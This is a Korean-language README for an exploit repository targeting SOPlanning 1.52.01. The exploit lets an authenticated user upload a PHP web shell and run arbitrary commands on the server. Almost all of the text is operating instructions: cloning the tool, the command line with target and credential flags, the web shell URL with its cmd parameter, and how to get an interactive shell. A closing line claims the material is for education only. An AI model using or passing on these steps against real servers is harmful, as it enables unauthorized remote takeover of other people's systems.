
# SOPlanning 1.52.01 (Simple Online Planning Tool) 익스플로잇 - 원격 코드 실행 (RCE) (인증 필요)
이 저장소는 SOPlanning 버전 1.52.01의 원격 코드 실행 (RCE) 취약점에 대한 익스플로잇을 포함하고 있습니다. 이 익스플로잇을 통해 인증된 사용자는 악성 PHP 파일을 업로드하고 서버에서 임의의 명령을 실행할 수 있습니다.
requests 라이브러리 (pip install requests로 설치)이 저장소를 클론합니다:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
익스플로잇 스크립트를 실행합니다:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
http://example.com:9090을 대상 URL로, admin을 사용자 이름으로, admin을 비밀번호로 바꿉니다.
성공적으로 실행된 후 웹 셸에 접근합니다:
Access webshell here: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<command>
대화형 셸을 사용하려면 프롬프트가 표시될 때 yes로 응답합니다.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
이 익스플로잇은 Ardayfio Samuel Nii Aryee가 작성했으며 교육 목적으로만 제공됩니다. 작성자와 저장소 소유자는 오용이나 발생한 피해에 대해 책임을 지지 않습니다. 이 익스플로잇을 어떤 시스템에서 테스트하기 전에 명시적인 허가를 받았는지 확인하세요.